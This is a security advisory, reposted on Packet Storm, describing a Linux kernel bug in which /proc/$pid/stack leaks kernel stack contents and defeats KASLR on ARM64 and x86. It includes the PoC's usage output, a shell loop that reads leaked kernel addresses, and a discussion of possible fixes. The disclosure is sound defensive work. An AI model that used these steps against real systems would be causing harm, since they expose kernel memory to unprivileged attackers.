what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux Semi-Arbitrary Task Stack Read On ARM64 / x86

Linux Semi-Arbitrary Task Stack Read On ARM64 / x86
Posted Oct 18, 2018
Authored by Jann Horn, Google Security Research

Linux suffers from a semi-arbitrary task stack read on ARM64 (and x86) via /proc/$pid/stack.

tags | advisory, arbitrary, x86
systems | linux
SHA-256 | aa57cf6a492d7f45505fa3498cb8e656f5d02f443b0cde3a3cb505708affcfc3

Linux Semi-Arbitrary Task Stack Read On ARM64 / x86

Change Mirror Download
Linux: semi-arbitrary task stack read on ARM64 (and x86) via /proc/$pid/stack 




This issue probably had the most impact on ARM64 kernels before
commit e01e80634ecd ("fork: unconditionally clear stack on fork", first in
v4.17); luckily, that hardening patch was backported all the way to v4.4 (but
not v3.16), so most systems probably have that patch already.

On both ARM64 and x86, /proc/$pid/stack can be used to inspect the symbolized
kernel stack of a task that is concurrently executing on another CPU. (x86 has
a check, but that check is racy, and a comment also documents that it is racy.)
This means that the kernel can potentially attempt to unwind an active task
stack starting from an outdated frame pointer, causing the kernel to interpret
new stack contents (potentially user-supplied data) as a stack frame.

On both x86 and ARM64, the kernel ensures that only stack frames inside the
target's task stack area are dereferenced.
On x86, it is also ensured that only stack frames whose saved instruction
pointer points to some valid text section are printed; on ARM64, stack frames
are printed independent of where the saved instruction pointer points.
The format string element used for printing such stack traces is "%pB", which is
normally used for writing information about kernel crashes to the console; on
kernels with CONFIG_KALLSYMS, it is implemented by sprint_backtrace(), which
falls back to printing raw addresses with "0x%lx" when an address can't be
mapped to a symbol.

On ARM64, the kernel ensures that stack frames are 16-byte-aligned.

This leads to two potential attacks:

1. An attacker can fake a stack frame with a controlled fake instruction pointer
and observe to which symbol the kernel maps it. This could be used both to
break kernel text ASLR and (if the attacker doesn't have access to the kernel
image anyway) to gain more fine-grained information about the layout of
kernel code.
2. An attacker can fake a stack frame that points to an arbitrary location in
the task stack (subject to alignment constraints) in order to leak data
stored at that address into the stack trace returned to userspace.
(This is more practical on ARM64, but might also work on x86 if you only need
to leak one byte at a time.)
3. A from my perspective relatively boring DoS: It looks as if building a loop
out of stackframes whose saved instruction pointers point into scheduler code
will send the task that's attempting to read /proc/$pid/stack into an endless
loop.

I have written a PoC for attack 2 and tested it on a Raspberry Pi 3, using a
custom 64-bit build of the Raspberry Pi kernel (based on 4.18.y) with
CONFIG_BPF_SYSCALL manually enabled (because I'm too lazy to search for a more
normal way to spray things on the kernel stack in the right places), built with
gcc 7.2.0. I have attached the PoC as pipe_read.c. The PoC leaks the BPF frame
pointer.

Usage:

In terminal 1:
==============
pi@raspberrypi:~/stack_dump$ gcc -o pipe_read pipe_read.c -pthread && ./pipe_read
==========================
0: (18) r0 = 0xbadbeefbadbeef00
2: (bf) r1 = r10
3: (07) r1 += -24
4: (7b) *(u64 *)(r10 -16) = r10
5: (7b) *(u64 *)(r10 -40) = r1
6: (7b) *(u64 *)(r10 -48) = r0
7: (7b) *(u64 *)(r10 -56) = r1
8: (7b) *(u64 *)(r10 -64) = r0
9: (7b) *(u64 *)(r10 -72) = r1
10: (7b) *(u64 *)(r10 -80) = r0
11: (7b) *(u64 *)(r10 -88) = r1
12: (7b) *(u64 *)(r10 -96) = r0
13: (7b) *(u64 *)(r10 -104) = r1
14: (7b) *(u64 *)(r10 -112) = r0
15: (7b) *(u64 *)(r10 -120) = r1
16: (7b) *(u64 *)(r10 -128) = r0
17: (7b) *(u64 *)(r10 -136) = r1
18: (7b) *(u64 *)(r10 -144) = r0
19: (7b) *(u64 *)(r10 -152) = r1
20: (7b) *(u64 *)(r10 -160) = r0
21: (7b) *(u64 *)(r10 -168) = r1
22: (7b) *(u64 *)(r10 -176) = r0
23: (7b) *(u64 *)(r10 -184) = r1
24: (7b) *(u64 *)(r10 -192) = r0
25: (7b) *(u64 *)(r10 -200) = r1
26: (7b) *(u64 *)(r10 -208) = r0
27: (7b) *(u64 *)(r10 -216) = r1
[...]
1920: (7b) *(u64 *)(r10 -480) = r0
1921: (7b) *(u64 *)(r10 -488) = r1
1922: (7b) *(u64 *)(r10 -496) = r0
1923: (7b) *(u64 *)(r10 -504) = r1
1924: (7b) *(u64 *)(r10 -512) = r0
1925: (b7) r0 = 0
1926: (95) exit
processed 1926 insns (limit 131072), stack depth 512
==========================
==============

In terminal 2:
==============
$ while true; do cat /proc/$(pgrep pipe_read)/stack; done |grep -A1 badbeef
[...]
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
[...]
==============

In terminal 3 (note that this requires kernel.kptr_restrict==1,
kptr_restrict=0 prints garbage):
==============
# grep _do_fork /proc/vmallocinfo | grep 0xffffff800e5c
0xffffff800e5c8000-0xffffff800e5cd000 20480 _do_fork+0xe8/0x420 pages=4 vmalloc
#
==============


I'm not sure what the best fix for this is.

32-bit ARM is playing it safe and just refuses to print stack traces for
non-current tasks if CONFIG_SMP is on:
==============
if (tsk != current) {
#ifdef CONFIG_SMP
/*
* What guarantees do we have here that 'tsk' is not
* running on another CPU? For now, ignore it as we
* can't guarantee we won't explode.
*/
if (trace->nr_entries < trace->max_entries)
trace->entries[trace->nr_entries++] = ULONG_MAX;
return;
#else
==============

With my "annoying security person" hat on: Would it make sense to just gate
proc_pid_stack() on file_ns_capable(m->file, &init_user_ns, CAP_SYS_ADMIN)?
That way, even if the unwind code gets some edgecase wrong, it won't cause the
disclosure of kernel memory to userspace.

If this code should continue to work without CAP_SYS_ADMIN, solving the issue is
probably not so straightforward...

One approach would be to fire an IPI to request that the target task dumps its
own stack.

Another approach might be to, between every time a pointer is read from the
target's stack and it is dereferenced, check somehow whether the target task has
been scheduled in the maintime. Perhaps by checking p->nvcsw, p->nivcsw and
p->on_cpu, if that works without races? The reason why I'd like to have more
than just one check at the end for this approach are (non-speculative) side
channels.


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.



Found by: jannh

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close